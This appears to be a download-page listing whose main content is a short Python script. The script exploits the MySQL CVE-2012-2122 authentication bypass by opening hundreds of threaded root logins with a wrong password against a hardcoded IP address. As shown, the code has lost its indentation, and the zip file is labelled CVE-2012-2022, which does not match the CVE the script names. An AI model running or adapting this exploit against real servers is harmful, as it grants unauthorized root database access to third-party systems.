import pymysql
import threading
import sys
import socket
url='42.192.212.170' #连接的主机IP也可是url
count = 0
def main(ip):
global count
try:
conn = pymysql.connect(host=ip,user='root',passwd='wrong',port=3306,charset='utf8')
cur = conn.cursor()
if cur !=None:
print('存在mysql CVE-2012-2122 漏洞')
count+=1
sys.exit(0)
except:
pass
def run():
ip = socket.gethostbyname(url)
ip=str(ip)
list_th=[]
for i in range(1,5):
for i in range(1,200):
t1=threading.Thread(target=main,args=(ip,))
if count !=0:
break
t1.start()
list_th.append(t1)
for stop in list_th:
stop.join()
if count == 0:
print('不存在mysql CVE-2012-2122 漏洞')
没有合适的资源?快使用搜索试试~ 我知道了~
资源详情
资源评论
资源推荐
收起资源包目录
CVE-2012-2022 mysql.zip (1个子文件)
CVE-2012-2022 mysql
cve-2012-2022.py 885B
共 1 条
- 1
xiaochuhe--kaishui
- 粉丝: 2w+
- 资源: 53
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
最新资源
资源上传下载、课程学习等过程中有任何疑问或建议,欢迎提出宝贵意见哦~我们会及时处理!
点击此处反馈
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功
评论0